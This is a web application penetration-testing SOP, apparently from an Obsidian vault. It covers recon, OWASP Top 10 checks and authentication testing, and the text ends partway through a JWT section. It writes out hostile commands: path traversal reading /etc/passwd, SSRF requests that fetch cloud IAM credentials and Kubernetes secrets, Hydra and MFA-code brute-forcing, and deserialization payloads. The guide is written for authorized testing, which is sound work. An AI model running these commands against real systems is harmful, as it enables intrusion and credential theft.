Synced from an Obsidian vault

For graph and advanced features, download the full Intel Codex Vault and open it in Obsidian.

Web Application Security Testing SOP

Authorized environments only. Test only systems for which you have explicit written authorization (signed SOW, ROE, or program scope). See Legal & Ethics before any active probing and OPSEC when sensitive scope, third-party data, or production systems are in play.

Table of Contents

1. Overview
2. Pre-Engagement & Authorization
3. Quick Reference
4. Testing Environment Setup
5. Reconnaissance & Information Gathering
6. OWASP Top 10 Vulnerabilities
7. Authentication & Session Management
8. Injection Attacks
9. Cross-Site Scripting (XSS)
10. Cross-Site Request Forgery (CSRF)
11. Access Control & Authorization
12. API Security Testing
13. File Upload Vulnerabilities
14. Business Logic Testing
15. Client-Side Security
16. Server-Side Security
17. Automated Scanning
18. Reporting & Remediation
19. Tools Reference
20. Legal & Ethical Considerations

---

Overview

Purpose: Comprehensive guide for web application penetration testing, vulnerability assessment, and security auditing.

Scope:

• OWASP Top 10 vulnerability testing
• Authentication and authorization testing
• API security assessment
• Business logic vulnerability identification
• Automated and manual testing methodologies

Prerequisites:

• Understanding of HTTP/HTTPS protocols
• Basic knowledge of web technologies (HTML, JavaScript, SQL)
• Familiarity with proxy tools (Burp Suite, OWASP ZAP)
• Written authorization for testing target applications

---

Pre-Engagement & Authorization

Web-application testing routinely brushes against production traffic, real user accounts, payment rails, and third-party SaaS surfaces — most engagements need explicit per-asset scoping rather than a blanket "test the app." Lock the boundaries in writing before any active probing. The bottom-of-document ## Legal & Ethical Considerations block carries the canonical authorization-letter template; this section is the operational pre-flight that runs before that paperwork is exercised.

Authorization Checklist

• Explicit URL allowlist of in-scope hosts/paths, with production vs staging vs preproduction environment named for each entry; sub-domains and APIs scoped individually.
• Automated-scanner concurrency cap and request-rate ceiling agreed (e.g. ffuf -rate, sqlmap --threads, Nuclei -rl); WAF / rate-limit bypass attempts pre-cleared.
• Account-creation policy documented: dedicated test accounts vs use of real-user fixtures; password-reset / MFA-enrollment flows allowed or excluded.
• File-upload destination cleanup commitment in writing — who deletes the test artefacts (uploaded shells, oversized files, EICAR samples) and when.
• DoS, traffic amplification, and stress / load fuzzing explicitly excluded unless a separate ROE addendum covers them.
• Third-party / SaaS / CDN / WAF / payment processor / identity-provider components flagged as out of scope by their own ToS unless the customer has a separate agreement with that vendor (Cloudflare, Akamai, Auth0, Stripe, Twilio, etc.).
• Authenticated vs unauthenticated test split documented per role; privilege-tier mapping (anon / user / staff / admin / superadmin) signed off.
• OAuth / OIDC / SAML test client and callback-URL rewrites authorized in writing — registering arbitrary redirect_uri values without coordination breaks IdP terms.
• SQLi / NoSQLi destructive-payload exclusion — no DROP, DELETE, UPDATE without WHERE, stacked-query writes, or blind-time payloads above an agreed ceiling outside an isolated staging env.
• Reporting alignment confirmed: OWASP Top 10:2025 IDs are primary; 2021 IDs included where downstream tooling (sqlmap, Nuclei, Burp issue defs) still emits them [verify 2026-04-26].
• Jurisdictional constraints reviewed — see Legal & Ethics (CFAA / Computer Misuse Act / EU Cybercrime Directive / data-protection framing).

Lab Environment Requirements

• Local clone of the target stack (Docker Compose, devcontainer, vendor sandbox image) seeded with synthetic data only — no production dump, no real PII, no live secrets.
• Burp Suite or OWASP ZAP project file pre-configured with target scope, upstream proxy, CA cert, and session-handling rules; commit the scope filter so reruns are reproducible. Caido is a lighter alternative when Burp Pro licensing is a blocker.
• Local technique-rehearsal labs available before touching the target: DVWA, OWASP Juice Shop, WebGoat, PortSwigger Web Security Academy, HackTheBox / TryHackMe web tracks. Rehearse novel SQLi / XSS / SSRF payloads here first.
• Separate browser profile (or dedicated container browser) for testing — isolates extensions, bookmarks, autofill, and saved sessions from personal/work browsing per OPSEC Plan.
• JWKS / OIDC test endpoint stood up locally (e.g. mkjwk.org static keyset, oidc-provider npm, Keycloak in a container) for JWT-bypass / kid injection / algorithm-confusion rehearsal before payloads hit the live IdP.
• Snapshot/restore the lab between runs when payloads are stateful (file uploads, account-creation chains, OAuth client registrations) so each replay starts from a known-good baseline.

Disclosure-Ready Posture

Wire up evidence capture at engagement start so the report is a packaging step, not a reconstruction. For each finding: HAR or Burp session export covering request → exploit → impact, paired payload corpus (fuzzlists, polyglots, the exact mutated body that hit), and preserved scanner output (Nuclei templates that fired, sqlmap session .sqlite files, ZAP *.session). Strip authenticated session material from the artefact bundle before hand-off — defang JWTs and cookies (truncate signatures, replace bearer tokens with <REDACTED:user-jwt>), and never ship a working session in the report. Screenshots should include the scope URL in the address bar / Burp host header so reviewers can verify the in-scope marker on sight. Apply the standard IOC-defang convention (hxxps://, domain[.]tld, user[@]domain) for any third-party indicators surfaced in the write-up. Per-finding chain-of-custody hashes and timeline per Collection Log; final severity scoring (CVSS 3.1 + 4.0), packaging, and disclosure routing (vendor PSIRT, CNA, platform triage queue, customer security team) per Reporting, Packaging & Disclosure.

---

Quick Reference

OWASP Top 10 (2025 / 2021)

Note: OWASP Top 10 2025 is the current published edition — see owasp.org/Top10/2025/. The detailed sections below are dual-labelled with both 2025 and 2021 IDs because most security tooling (sqlmap, Nuclei templates, Burp issue definitions) still emits 2021 IDs as of 2026-04-25. Map findings to both ID sets per engagement reporting requirements. 2025 changes worth noting: Security Misconfiguration jumped A05:2021 → A02:2025; A06:2021 Vulnerable Components broadened into A03:2025 Software Supply Chain Failures; SSRF (A10:2021) dropped from the Top 10 — methodology still in §A10 below; A10:2025 Mishandling of Exceptional Conditions is new (not yet covered by a dedicated section in this SOP — [verify 2026-04-25] for follow-up content pass).

Rank	Vulnerability	Impact	Common Tools
A01	Broken Access Control	High	Burp Suite, AuthMatrix
A02	Cryptographic Failures	High	SSL Labs, testssl.sh
A03	Injection	Critical	sqlmap, Burp Intruder
A04	Insecure Design	Medium	Manual review
A05	Security Misconfiguration	Medium	Nikto, Nmap
A06	Vulnerable Components	High	Retire.js, Snyk
A07	Authentication Failures	Critical	Hydra, Burp Intruder
A08	Software & Data Integrity	High	Manual review
A09	Logging & Monitoring Failures	Low	Manual review
A10	Server-Side Request Forgery	High	Burp Collaborator

Critical Commands

# Quick subdomain enumeration
subfinder -d target.com | httprobe | tee alive_subdomains.txt

# Fast port scan
nmap -p- --min-rate 10000 target.com

# SQL injection test
sqlmap -u "http://target.com/page?id=1" --batch --risk=3 --level=5

# XSS scanning
dalfox url http://target.com/search?q=test

# Directory brute-force
ffuf -u http://target.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

# SSL/TLS testing
testssl.sh --full target.com

---

Testing Environment Setup

Kali Linux / ParrotOS (Recommended)

Install essential tools:

# Update system
sudo apt update && sudo apt upgrade -y

# Install core web testing tools
sudo apt install -y \
    burpsuite \
    zaproxy \
    sqlmap \
    nikto \
    dirb \
    gobuster \
    wfuzz \
    ffuf \
    nmap \
    masscan \
    subfinder \
    amass \
    httprobe \
    nuclei \
    chromium \
    firefox-esr

# Install additional tools via Go (module paths current as of 2026-04-25)
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest      # Nuclei 3.x is current; v2 path no longer maintained
go install github.com/projectdiscovery/httpx/cmd/httpx@latest
go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install github.com/projectdiscovery/katana/cmd/katana@latest             # JS-aware crawler (replaces hakrawler/gospider for SPA targets)
go install github.com/ffuf/ffuf/v2@latest
go install github.com/tomnomnom/waybackurls@latest
go install github.com/lc/gau/v2/cmd/gau@latest
go install github.com/hahwul/dalfox/v2@latest

# Install Burp Suite extensions
# Extensions to install manually in Burp:
# - Autorize (authorization testing)
# - AuthMatrix (role-based access control)
# - Turbo Intruder (fast brute-forcing)
# - JSON Web Tokens (JWT analysis)
# - Active Scan++ (enhanced scanning)

Windows Setup

# Install Chocolatey (package manager)
Set-ExecutionPolicy Bypass -Scope Process -Force
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072
iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))

# Install tools
choco install -y burp-suite-free-edition
choco install -y zaproxy
choco install -y nmap
choco install -y python
choco install -y golang

# Install Python-based tools (use a venv on Python 3.11+; PEP 668 blocks system pip on most distros)
# sqlmap evolves daily — prefer the upstream git checkout over PyPI for latest payloads:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git ~/tools/sqlmap
pip install dirsearch
pip install wfuzz   # wfuzz upstream is largely unmaintained since 2022 [verify 2026-04-25]; ffuf preferred for new work
pip install arjun   # HTTP parameter discovery

macOS Setup

# Install Homebrew
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

# Install tools
brew install --cask burp-suite
brew install nmap
brew install gobuster
brew install ffuf
brew install python
brew install go

# Install Python tools (use `python3 -m venv` on macOS 14+; system Python is externally-managed)
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git ~/tools/sqlmap   # canonical install — evolves daily
pip3 install dirsearch
pip3 install arjun

Browser Configuration

Firefox for web testing:

# Install Firefox extensions:
# 1. FoxyProxy (proxy switching)
# 2. Wappalyzer (technology detection)
# 3. Cookie-Editor (cookie manipulation)
# 4. User-Agent Switcher (UA spoofing)

# Firefox about:config tweaks for testing:
# network.proxy.allow_hijacking_localhost → true
# security.fileuri.strict_origin_policy → false
# network.http.referer.XOriginPolicy → 0

Chrome/Chromium for web testing:

# Launch Chrome with disabled security (TESTING ONLY):
# Linux:
chromium --disable-web-security --user-data-dir=/tmp/chrome_dev --proxy-server=127.0.0.1:8080

# Windows:
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-web-security --user-data-dir=C:\Temp\chrome_dev --proxy-server=127.0.0.1:8080

# macOS:
open -na "Google Chrome" --args --disable-web-security --user-data-dir=/tmp/chrome_dev --proxy-server=127.0.0.1:8080

Burp Suite Configuration

Launch Burp Suite:

# Linux:
java -jar -Xmx4g /usr/share/burpsuite/burpsuite.jar

# Windows:
# Use desktop shortcut or:
"C:\Program Files\BurpSuiteCommunity\BurpSuiteCommunity.exe"

# macOS:
open /Applications/Burp\ Suite\ Community\ Edition.app

Proxy configuration (default: 127.0.0.1:8080):

1. Burp → Proxy → Options → Add proxy listener
2. Import Burp CA certificate:

# Firefox: Preferences → Privacy & Security → Certificates → View Certificates → Import
# Download from: http://burp/cert (when Burp proxy is running)

# Linux system-wide:
sudo cp burp_ca.crt /usr/local/share/ca-certificates/
sudo update-ca-certificates

# Windows system-wide:
# certutil -addstore -f "ROOT" burp_ca.crt

# macOS system-wide:
sudo security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain burp_ca.crt

---

Reconnaissance & Information Gathering

Subdomain Enumeration

Passive enumeration (no direct target interaction):

# Subfinder (multiple sources: VirusTotal, CertSpotter, etc.)
subfinder -d target.com -o subdomains.txt

# Amass (comprehensive, slower)
amass enum -passive -d target.com -o amass_subdomains.txt

# Certificate Transparency logs
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sort -u

# Wayback Machine URLs
waybackurls target.com | tee wayback_urls.txt

# Common Crawl + Alien Vault
gau target.com | tee gau_urls.txt

Active enumeration (sends DNS queries to target):

# DNS brute-force with fierce
fierce --domain target.com --subdomains /usr/share/wordlists/subdomains.txt

# Gobuster DNS mode
gobuster dns -d target.com -w /usr/share/wordlists/subdomains-top1million-110000.txt -o gobuster_dns.txt

# Check which subdomains are alive
cat subdomains.txt | httprobe | tee alive_subdomains.txt

# Httpx for web server detection
cat alive_subdomains.txt | httpx -title -tech-detect -status-code -o httpx_results.txt

Port Scanning & Service Enumeration

# Fast SYN scan (requires root)
sudo nmap -sS -p- --min-rate 10000 target.com -oN nmap_fast.txt

# Service version detection
nmap -sV -p 80,443,8080,8443 target.com -oN nmap_services.txt

# Comprehensive scan with scripts
nmap -sC -sV -A -p- target.com -oN nmap_full.txt

# HTTP methods enumeration
nmap --script http-methods target.com -p 80,443,8080

# SSL/TLS vulnerability scanning
nmap --script ssl-enum-ciphers,ssl-cert,ssl-heartbleed target.com -p 443

Technology Stack Detection

# Whatweb (command-line)
whatweb -v -a 3 http://target.com

# Wappalyzer (browser extension)
# Install from: https://www.wappalyzer.com/

# HTTP headers analysis
curl -I http://target.com

# Example output:
# Server: nginx/1.18.0
# X-Powered-By: PHP/7.4.3
# Set-Cookie: PHPSESSID=abc123

# Detect CMS
# WordPress:
curl -s http://target.com/wp-admin/ | grep "WordPress"

# Drupal:
curl -s http://target.com/CHANGELOG.txt | head -1

# Joomla:
curl -s http://target.com/administrator/ | grep "Joomla"

Directory & File Discovery

# Ffuf (fast, recommended)
ffuf -u http://target.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc 200,301,302,403 -o ffuf_dirs.json

# Gobuster (directory mode)
gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,bak -o gobuster_dirs.txt

# Dirsearch (Python-based)
dirsearch -u http://target.com -e php,html,js,txt -x 404,403 --format plain -o dirsearch_results.txt

# Feroxbuster (recursive scanning)
feroxbuster -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --depth 4

# Custom wordlist for API endpoints
ffuf -u http://target.com/api/FUZZ -w api_endpoints.txt -mc 200,201,401,403

# Example api_endpoints.txt:
# v1/users
# v1/auth/login
# v2/products
# admin/config
# graphql

Parameter Discovery

# Arjun (parameter discovery)
arjun -u http://target.com/search

# Example output:
# [+] Found parameters: q, page, sort, filter

# ParamSpider (extract parameters from Wayback Machine)
python3 paramspider.py --domain target.com --output params.txt

# Test parameters for reflection
cat params.txt | while read param; do
    curl -s "http://target.com/search?${param}=FUZZ_XSS" | grep "FUZZ_XSS" && echo "[+] Reflected: $param"
done

JavaScript Analysis

# Download all JavaScript files
wget -r -l1 -H -t1 -nd -N -np -A.js -erobots=off http://target.com

# Extract endpoints from JS files
cat *.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort -u

# Find API keys in JS
cat *.js | grep -Eo "api[_-]?key['\"]?\s*[:=]\s*['\"]?[a-zA-Z0-9_-]{20,}"

# LinkFinder (extract endpoints from JS)
python3 linkfinder.py -i http://target.com/app.js -o endpoints.html

# Retire.js (vulnerable JavaScript library detection)
retire --js --jspath http://target.com

---

OWASP Top 10 Vulnerabilities

A01:2025 / A01:2021 - Broken Access Control

Concept: Users can access resources or perform actions they shouldn't be authorized for.

Common vulnerabilities:

• Insecure Direct Object Reference (IDOR)
• Path traversal
• Missing function-level access control
• Horizontal/vertical privilege escalation

Testing methodology:

# 1. IDOR testing - Modify user IDs
# Original request:
GET /api/user/123/profile HTTP/1.1
Cookie: session=user123_session

# Modified request (try accessing user 124):
GET /api/user/124/profile HTTP/1.1
Cookie: session=user123_session

# Expected: 403 Forbidden or 401 Unauthorized
# Vulnerable: 200 OK with user 124's data

Burp Suite - Autorize extension workflow:

1. Install Autorize extension
2. Configure low-privilege user session token
3. Browse application as high-privilege user
4. Autorize automatically replays requests with low-privilege token
5. Review results for unauthorized access

Path traversal testing:

# Directory traversal payloads
curl "http://target.com/download?file=../../../../etc/passwd"
curl "http://target.com/download?file=..%2f..%2f..%2f..%2fetc%2fpasswd"
curl "http://target.com/download?file=....//....//....//etc/passwd"

# Windows paths
curl "http://target.com/download?file=..\..\..\..\windows\system32\drivers\etc\hosts"

# Null byte injection (older PHP versions)
curl "http://target.com/download?file=../../../../etc/passwd%00.jpg"

Horizontal privilege escalation:

# User A's account:
GET /account/settings HTTP/1.1
Cookie: session=userA_session

POST /account/update HTTP/1.1
Cookie: session=userA_session
Content-Type: application/x-www-form-urlencoded

user_id=123&email=newmail@example.com

# Attempt to modify user B's account:
POST /account/update HTTP/1.1
Cookie: session=userA_session
Content-Type: application/x-www-form-urlencoded

user_id=124&email=attacker@example.com  # Try to modify user 124's email

Vertical privilege escalation:

# Standard user attempting admin action:
GET /admin/users HTTP/1.1
Cookie: session=standard_user_session

# Check for parameter pollution:
GET /admin/users?role=admin HTTP/1.1
Cookie: session=standard_user_session

# Mass assignment vulnerability:
POST /api/user/update HTTP/1.1
Cookie: session=standard_user_session
Content-Type: application/json

{
    "email": "user@example.com",
    "is_admin": true  # Try to elevate privileges
}

A04:2025 / A02:2021 - Cryptographic Failures

Concept: Sensitive data exposed due to weak or missing encryption.

Common issues:

• Unencrypted data transmission (HTTP instead of HTTPS)
• Weak encryption algorithms (MD5, SHA1, DES)
• Hardcoded encryption keys
• Predictable tokens

SSL/TLS testing:

# testssl.sh (comprehensive SSL/TLS testing)
testssl.sh --full https://target.com

# Check for specific vulnerabilities:
testssl.sh --heartbleed --ccs-injection --ticketbleed https://target.com

# SSL Labs online scanner:
# https://www.ssllabs.com/ssltest/analyze.html?d=target.com

# Nmap SSL scripts
nmap --script ssl-enum-ciphers,ssl-cert,ssl-heartbleed,ssl-poodle -p 443 target.com

# Check for weak ciphers
nmap --script ssl-enum-ciphers -p 443 target.com | grep -E "weak|broken|deprecated"

Weak hashing detection:

# Analyze password hashes from database dump
hashid '$1$abc123$xyz789'  # Identifies hash type

# Example vulnerable hashes:
# MD5: 5d41402abc4b2a76b9719d911017c592 (weak)
# SHA1: 356a192b7913b04c54574d18c28d46e6395428ab (weak)
# bcrypt: $2y$10$... (strong)

# Check for plaintext passwords in HTTP traffic (Wireshark)
tshark -r capture.pcap -Y "http.request.method == POST" -T fields -e http.file_data | grep -i "password="

Insecure randomness:

# Vulnerable token generation (predictable)
import random
token = random.randint(100000, 999999)  # NOT cryptographically secure

# Secure token generation
import secrets
token = secrets.token_urlsafe(32)  # Cryptographically secure

A05:2025 / A03:2021 - Injection

See detailed section: Injection Attacks

A06:2025 / A04:2021 - Insecure Design

Concept: Fundamental flaws in application architecture and business logic.

Common issues:

• Missing rate limiting
• No account lockout after failed login attempts
• Insufficient workflow validation
• Trust boundary violations

Testing methodology:

# Rate limiting test
for i in {1..1000}; do
    curl -X POST http://target.com/api/login \
        -d "username=admin&password=wrong$i" &
done
# Expected: 429 Too Many Requests after ~10 attempts
# Vulnerable: Unlimited attempts allowed

# Account enumeration
curl -X POST http://target.com/api/login -d "username=existinguser&password=wrong"
# Response: "Invalid password" (user exists)

curl -X POST http://target.com/api/login -d "username=nonexistent&password=wrong"
# Response: "User not found" (enumeration possible)

# Secure response: "Invalid username or password" (same for both cases)

A02:2025 / A05:2021 - Security Misconfiguration

Common issues:

• Default credentials
• Directory listing enabled
• Verbose error messages
• Unnecessary services enabled
• Missing security headers

Testing:

# Check for default credentials
# Common defaults:
# admin:admin
# admin:password
# root:root
# admin:123456

# Directory listing test
curl http://target.com/uploads/
# Vulnerable output:
# <html><head><title>Index of /uploads/</title></head>

# Verbose error messages
curl http://target.com/nonexistent.php
# Vulnerable output:
# Fatal error: include(config.php): failed to open stream: No such file in /var/www/html/index.php on line 5

# Check security headers
curl -I http://target.com

# Missing headers (vulnerable):
# ❌ X-Frame-Options
# ❌ X-Content-Type-Options
# ❌ Strict-Transport-Security
# ❌ Content-Security-Policy

# Secure headers:
# ✅ X-Frame-Options: DENY
# ✅ X-Content-Type-Options: nosniff
# ✅ Strict-Transport-Security: max-age=31536000; includeSubDomains
# ✅ Content-Security-Policy: default-src 'self'

Nikto automated scanner:

nikto -h http://target.com -o nikto_report.html -Format html

# Common findings:
# - Server version disclosure
# - Missing security headers
# - Default files present
# - SSL/TLS issues

A03:2025 (broadened to Software Supply Chain Failures) / A06:2021 - Vulnerable and Outdated Components

2025 reframing: A06:2021 Vulnerable and Outdated Components was widened in A03:2025 Software Supply Chain Failures to include build-pipeline, package-registry, and signed-artefact integrity in addition to outdated libs. The component-scanning techniques below remain valid; for supply-chain-specific testing add SBOM verification (CycloneDX/SPDX), package-confusion checks (PyPI/npm/Maven typosquatting), and pipeline-hardening review.

Detection:

# Retire.js (JavaScript libraries)
retire --js --jspath http://target.com

# Snyk (dependency scanning)
snyk test

# OWASP Dependency-Check
dependency-check --project "MyApp" --scan /path/to/project

# Check WordPress plugins/themes
wpscan --url http://target.com --enumerate vp,vt --api-token YOUR_TOKEN

# Check Drupal modules
droopescan scan drupal -u http://target.com

# Manual version detection
curl -s http://target.com/js/jquery.js | grep "jQuery v"
# Output: jQuery v1.8.2 (vulnerable to CVE-2015-9251)

A07:2025 / A07:2021 - Authentication Failures

See detailed section: Authentication & Session Management

A08:2025 / A08:2021 - Software or Data Integrity Failures

Concept: Code or infrastructure updates without integrity verification.

Testing:

# Check for Subresource Integrity (SRI)
curl -s http://target.com | grep "<script" | grep -v "integrity="
# Vulnerable: External scripts without SRI

# Secure example:
# <script src="https://cdn.example.com/lib.js"
#         integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/ux..."
#         crossorigin="anonymous"></script>

# Insecure deserialization test (PHP)
# Payload: O:8:"stdClass":1:{s:4:"exec";s:10:"phpinfo();";}
echo 'TzoxMDoiRXZpbENsYXNzIjoxOntzOjQ6ImNtZCI7czoxMDoicGhwaW5mbygpOyI7fQ==' | base64 -d

# Test for serialized object injection
curl -X POST http://target.com/profile \
    -H "Content-Type: application/x-www-form-urlencoded" \
    -d "data=O:4:\"User\":1:{s:5:\"admin\";b:1;}"

A09:2025 / A09:2021 - Security Logging and Alerting Failures

Testing approach:

# Test if failed login attempts are logged
# Perform 10 failed login attempts
for i in {1..10}; do
    curl -X POST http://target.com/login -d "username=admin&password=wrong$i"
done

# Check if account was locked (good)
# Check if you received notification email (good)
# No response difference = vulnerable

# Test if admin actions are logged
# Change user role, delete data, etc.
# Request audit logs via support/legal team

(Dropped from 2025 Top 10) / A10:2021 - Server-Side Request Forgery (SSRF)

2025 status: SSRF dropped out of OWASP Top 10:2025 (replaced at A10 by Mishandling of Exceptional Conditions). The technique remains operationally critical — cloud-metadata exposure, internal service discovery, and gopher-protocol pivots are still rewarded on bug-bounty programs and exploited in real incidents. Methodology retained below; relabel as out-of-Top-10 finding in 2025-aligned reports if the client mandates strict alignment.

Concept: Attacker tricks server into making requests to unintended locations.

Testing methodology:

# Basic SSRF test
curl "http://target.com/fetch?url=http://127.0.0.1:22"
# Vulnerable response: SSH banner

curl "http://target.com/fetch?url=http://169.254.169.254/latest/meta-data/"
# Vulnerable: AWS metadata exposed (IMDSv1 — token-less; new EC2 instances launched after 2024-01-29 default to IMDSv2-only, see Cloud metadata SSRF section below)

# Common SSRF parameters:
# url=, uri=, path=, dest=, redirect=, next=, data=, reference=, site=, html=

# Bypass filters:
# http://127.0.0.1 → http://127.1 → http://0x7f.0x0.0x0.0x1
# http://localhost → http://localtest.me → http://spoofed.burpcollaborator.net

# Burp Collaborator for out-of-band detection
# 1. Burp → Burp Collaborator client → Copy to clipboard
# 2. Test payload:
curl "http://target.com/fetch?url=http://abc123.burpcollaborator.net"
# 3. Check Collaborator for HTTP request

Cloud metadata SSRF:

# AWS — IMDSv1 (no token; older instances or instances with HttpTokens=optional)
curl "http://target.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"

# AWS — IMDSv2 (default for new instances since 2024-01-29; requires session token via PUT,
# which is reachable via SSRF only if the proxy forwards arbitrary methods AND custom headers).
# Step 1: obtain token (PUT with TTL header)
curl -X PUT "http://target.com/proxy?url=http://169.254.169.254/latest/api/token" \
     -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"
# Step 2: query metadata with the token
curl "http://target.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/" \
     -H "X-aws-ec2-metadata-token: <TOKEN_FROM_STEP_1>"
# If the proxy strips PUT or custom headers, IMDSv2 SSRF fails — record this as a control working as designed.

# Google Cloud — `Metadata-Flavor: Google` header is REQUIRED (request without it returns 403)
curl "http://target.com/proxy?url=http://metadata.google.internal/computeMetadata/v1/" \
     -H "Metadata-Flavor: Google"
# Same SSRF caveat: proxy must forward custom headers. Service-account tokens at:
#   http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

# Azure — `Metadata: true` header REQUIRED; api-version pin is mandatory
curl "http://target.com/proxy?url=http://169.254.169.254/metadata/instance?api-version=2021-02-01" \
     -H "Metadata: true"
# Managed identity token endpoint:
#   http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/

# Alibaba Cloud
curl "http://target.com/proxy?url=http://100.100.100.200/latest/meta-data/"

# DigitalOcean (no auth header required)
curl "http://target.com/proxy?url=http://169.254.169.254/metadata/v1/"

# Oracle Cloud (OCI) — Authorization header required [verify 2026-04-25]
curl "http://target.com/proxy?url=http://169.254.169.254/opc/v2/instance/" \
     -H "Authorization: Bearer Oracle"

# Kubernetes — internal API server / service-account token (cluster-internal SSRF)
curl "http://target.com/proxy?url=https://kubernetes.default.svc/api/v1/namespaces/default/secrets"
# In-pod token at /var/run/secrets/kubernetes.io/serviceaccount/token

Bypass technique reminders:

• DNS rebinding (e.g. localtest.me, nip.io) for filters that resolve once.
• IPv6 loopback [::1] / IPv4-mapped IPv6 [::ffff:127.0.0.1].
• Decimal/octal/hex IPs (http://2130706433/ = 127.0.0.1).
• URL parser confusion (http://attacker.com#@target/, http://attacker.com\@target/, http://target%2540attacker/).
• Redirect chains: open-redirect on attacker-controlled host → metadata endpoint.
• Gopher protocol for binary protocols (Redis, MySQL) when supported by the back-end fetcher.

---

Authentication & Session Management

Password Brute-Forcing

Hydra (multi-protocol brute-force):

# HTTP POST form brute-force
hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"

# Explanation:
# -l admin: Username is "admin"
# -P rockyou.txt: Password wordlist
# http-post-form: Protocol
# /login: Target path
# username=^USER^&password=^PASS^: POST parameters
# F=incorrect: Failure string in response

# HTTP Basic Auth
hydra -l admin -P passwords.txt target.com http-get /admin/

# SSH brute-force
hydra -l root -P passwords.txt ssh://target.com

# FTP brute-force
hydra -l admin -P passwords.txt ftp://target.com

Burp Suite Intruder:

1. Capture login request in Burp Proxy
2. Right-click → Send to Intruder
3. Positions tab: Mark password parameter

   username=admin&password=§FUZZ§

4. Payloads tab: Load password list
5. Options tab: Grep - Match for success indicators
6. Start attack

Detecting weak passwords:

# Common credentials test
curl -X POST http://target.com/api/login \
    -H "Content-Type: application/json" \
    -d '{"username":"admin","password":"admin"}'

# Top 25 most common passwords:
# 123456, password, 12345678, qwerty, 123456789, 12345, 1234, 111111, 1234567, dragon, 123123, baseball, abc123, football, monkey, letmein, shadow, master, 666666, qwertyuiop, 123321, mustang, 1234567890, michael, 654321

Session Management Testing

Session token analysis:

# Capture multiple session tokens
for i in {1..50}; do
    curl -s -c cookies$i.txt http://target.com/login \
        -d "username=user$i&password=password$i"
    grep "session" cookies$i.txt >> all_sessions.txt
done

# Analyze tokens for patterns
cat all_sessions.txt
# Vulnerable examples:
# session=user1_1234567890  (predictable)
# session=MTIzNDU2Nzg5MA== (base64 of timestamp)
# session=md5(username)     (weak)

# Secure example:
# session=7c3a8f9b2e1d4a6c9f8e7b3a2d1c0f9e8d7c6b5a4f3e2d1c0b9a8f7e6d5c4b3a (random, 256-bit)

Session fixation test:

# 1. Attacker obtains session ID before login
curl -s -c cookies.txt http://target.com
# Set-Cookie: PHPSESSID=abc123

# 2. Send link to victim with fixed session ID
# http://target.com/?PHPSESSID=abc123

# 3. Victim logs in using fixed session ID

# 4. Attacker uses same session ID to access victim's account
curl -b "PHPSESSID=abc123" http://target.com/dashboard

# Expected (secure): New session ID generated after login
# Vulnerable: Same session ID persists after authentication

Session timeout testing:

# 1. Login and capture session token
SESSION="7c3a8f9b2e1d4a6c9f8e7b3a2d1c0f9e"

# 2. Wait 30 minutes (or configured timeout)
sleep 1800

# 3. Attempt to access protected resource
curl -b "session=$SESSION" http://target.com/admin/dashboard

# Expected: 401 Unauthorized or redirect to login
# Vulnerable: 200 OK (session never expires)

Logout functionality:

# 1. Login and capture session
curl -s -c cookies.txt http://target.com/login -d "username=test&password=test123"
SESSION=$(grep "session" cookies.txt | awk '{print $7}')

# 2. Logout
curl -b "session=$SESSION" http://target.com/logout

# 3. Try to reuse session
curl -b "session=$SESSION" http://target.com/dashboard

# Expected: 401 Unauthorized (session invalidated)
# Vulnerable: 200 OK (session still valid after logout)

Multi-Factor Authentication (MFA) Bypass

Common bypass techniques:

# 1. Direct endpoint access (skip MFA page)
# Normal flow:
# /login → /mfa-verify → /dashboard

# Bypass attempt:
curl -b "session=partial_auth_session" http://target.com/dashboard
# Vulnerable if dashboard accessible without MFA

# 2. Response manipulation
# Capture MFA verification response:
POST /mfa-verify HTTP/1.1
Content-Type: application/json

{"code": "000000"}

# Response:
{"success": false, "mfa_valid": false}

# Modify response to:
{"success": true, "mfa_valid": true}

# 3. Rate limiting bypass
# Test unlimited MFA code attempts:
for code in {000000..999999}; do
    curl -X POST http://target.com/mfa-verify \
        -b "session=xyz" \
        -d "code=$code" &
done

# 4. Backup codes enumeration
curl -X POST http://target.com/mfa-verify -d "backup_code=00000000"
curl -X POST http://target.com/mfa-verify -d "backup_code=00000001"
# Should have rate limiting

JWT (JSON Web Token) Testing

JWT structure:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

Part 1 (Header):    eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
Part 2 (Payload):   eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ
Part 3 (Signature): SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

Decode JWT:

# Decode using jwt_tool
